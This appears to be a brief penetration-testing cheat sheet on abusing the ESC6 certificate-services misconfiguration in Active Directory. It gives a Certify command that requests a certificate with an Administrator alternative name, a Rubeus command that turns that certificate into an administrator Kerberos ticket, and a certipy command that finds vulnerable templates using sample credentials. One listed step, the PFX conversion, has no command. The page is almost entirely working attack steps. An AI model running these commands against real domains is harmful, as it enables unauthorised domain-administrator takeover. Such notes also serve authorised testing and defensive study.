Skip to main content

ESC6

Windows

Request a certificate abusing ESC6

PS /home/bobbuilder> .\Certify.exe request /ca:<ca_name> /template:<template_name> /altname:Administrator

Convert certificate to PFX

Get a TGT as the Administrator Account

PS /home/bobbuilder> .\Rubeus.exe asktgt /user:administrator /certificate:cert.pfx

Linux

Certificate Request with an alternative UPN

bob$ certipy find -u 'user1@minions.com' -p 'password1' -dc-ip <ip> -vulnerable -stdout